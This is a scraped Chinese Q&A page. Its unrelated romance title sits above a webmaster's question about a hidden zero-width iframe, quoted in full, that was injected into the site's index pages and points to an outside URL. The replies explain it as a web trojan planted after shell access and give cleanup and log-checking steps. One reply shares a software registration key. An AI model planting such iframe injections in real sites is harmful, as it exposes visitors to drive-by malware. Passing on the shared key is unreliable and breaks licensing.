童话爱情故事讲给女友:请网页病毒高手进来回答个问题

来源:百度文库 编辑:高考问答 时间:2024/04/29 14:55:19
在本网站服务器上,每个文件夹的主页里(比如index或defaul或conn)的网页里,都突然间多出一行代码来。代码如下:
<iframe src=http://www.pdfgj.com/img/index.htm width=0 height=0 frameborder=0></iframe>
请问,这段代码是怎么加上去的,如何去防治?是什么东西?谢谢了。不可能去人工的去掉,就算是去掉了,我想,如果是程序加上去的,主要是想把根源找出来。

恩,网页木马,某个人拿到你的shell,之后用一个程序批量挂马,方法的话:你用filemon检测你文件的活动,之后找到那个进程了以后,把他杀掉,之后删除对应的文件,然后修复注册表,用RegFix修复文件关联,之后全面杀毒,手动分析进程等等的。

有问题的话Mailto:tyeken6@163.com。我刚中考完,等我录取通知书下来了就回复。谢谢。

可以用费尔托斯特安全 2005(世界第3名)
注册码: 31AC-92BD-AD43-0C8E-1499
注册码有效期: 1年
病毒库授权使用期限: 自第一次成功注册时间开始至2006年12月31日(包含)终止
软件授权使用期限: 自第一次成功注册时间开始至2006年12月31日(包含)终止
瑞星垃圾

一般人工加入,就是在打开你网页同时打开一个高为0 宽为0的窗口(也就是不可见的窗口)连接到他留下的网址。程序理论上可以实现,不过占时没见过类似程序。防治的方法就是防止别人拿到你的SHELL,换句话说就是不能让人在你的空间有写入、修改操作权限。一般想查到下马者可以通过查看IIS日志或者其他日志文件。

网页木马